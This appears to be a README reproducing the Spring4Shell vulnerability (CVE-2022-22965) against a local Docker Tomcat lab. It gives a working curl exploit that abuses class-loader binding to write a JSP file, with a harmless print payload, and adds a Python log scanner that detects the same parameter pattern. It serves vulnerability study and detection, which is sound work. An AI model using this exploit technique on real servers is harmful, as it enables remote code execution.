Minimal example of how to reproduce CVE-2022-22965 Spring RCE.
```shell
docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0
```
Add `-p 5005:5005 -e "JAVA_OPTS=-Xdebug -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005"` if you want to debug remotely.
```shell
./mvnw install
docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps
```
```shell
curl -X POST \
  -H "pre:<%" \
  -H "post:;%>" \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \
  http://localhost:8888/handling-form-submission-complete/greeting
```
The exploit creates the file `rce.jsp` in `webapps/handling-form-submission-complete` on the web server.
```shell
curl http://localhost:8888/handling-form-submission-complete/rce.jsp
```
Now you'll see `123` in the container's terminal.
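As an added triage example (not part of this repository), the script below scans request logs for parameter names that bind into `class.*`, the path the curl request above abuses, and reports whether all five `pipeline.first.*` AccessLogValve properties were set in one request. The log format and sample lines are constructed for the example; the `class`-segment check mirrors the field denylist Spring published as a workaround for this CVE.

```python
"""Flag requests whose parameter names reach into the bound bean's class
loader (the CVE-2022-22965 binding path). Log format is constructed for this
example: "<METHOD> <path> [<name>=<value>&...]"."""
import re
from urllib.parse import parse_qs

# A dotted property path with a segment "class"/"Class" is what the Spring
# workaround denylist ("class.*", "Class.*", "*.class.*", "*.Class.*") refuses
# to bind; matching case-insensitively catches both spellings.
CLASS_SEGMENT = re.compile(r"(^|\.)class(\.|$)", re.IGNORECASE)

# The AccessLogValve properties the reproduction above sets to write rce.jsp.
VALVE_PREFIX = "class.module.classLoader.resources.context.parent.pipeline.first."
VALVE_PROPS = {"pattern", "suffix", "directory", "prefix", "fileDateFormat"}


def classify_params(names):
    """Return (touches_classloader, valve_props_set) for one request's parameter names."""
    hits = [n for n in names if CLASS_SEGMENT.search(n)]
    valve = {n[len(VALVE_PREFIX):] for n in hits if n.startswith(VALVE_PREFIX)}
    return bool(hits), valve & VALVE_PROPS


def scan_log(lines):
    """One finding per request that binds into class.*; 'writes_jsp' is True
    only when all five valve properties from the reproduction are present."""
    findings = []
    for line in lines:
        method, path, query = (line.split(" ", 2) + [""])[:3]
        names = list(parse_qs(query, keep_blank_values=True))
        touches, valve = classify_params(names)
        if touches:
            findings.append({"method": method, "path": path,
                             "valve_props": sorted(valve),
                             "writes_jsp": valve == VALVE_PROPS})
    return findings


# Constructed sample lines; the second mirrors the curl request in the README
# with placeholder values instead of the JSP payload.
SAMPLE_LOG = [
    "POST /handling-form-submission-complete/greeting id=1&content=hello",
    "POST /handling-form-submission-complete/greeting "
    + "&".join(f"{VALVE_PREFIX}{p}=x" for p in sorted(VALVE_PROPS)),
    "GET /handling-form-submission-complete/rce.jsp",
    "GET /handling-form-submission-complete/greeting Class.module.classLoader.defaultAssertionStatus=true",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```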